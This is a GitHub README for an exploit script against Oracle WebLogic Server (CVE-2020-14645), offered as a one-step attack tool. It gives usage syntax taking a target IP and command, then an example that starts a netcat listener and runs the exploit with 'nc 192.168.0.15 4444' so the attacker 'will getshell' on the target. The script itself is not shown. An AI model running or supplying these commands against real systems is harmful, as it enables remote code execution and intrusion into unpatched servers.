Skip to content

Latest commit

 

History

History
15 lines (8 loc) · 297 Bytes

README.md

File metadata and controls

15 lines (8 loc) · 297 Bytes

CVE-2020-14645

Weblogic Server CVE-2020-14645 EXP for Python (complete in one step)

Useage: Python3 exploit.py -t <tartget IP> -c <command>

tips: No echo
Example:

nc -lvnp 4444

Python3 exploit.py -t 192.168.0.14 -c 'nc 192.168.0.15 4444'

then you will getshell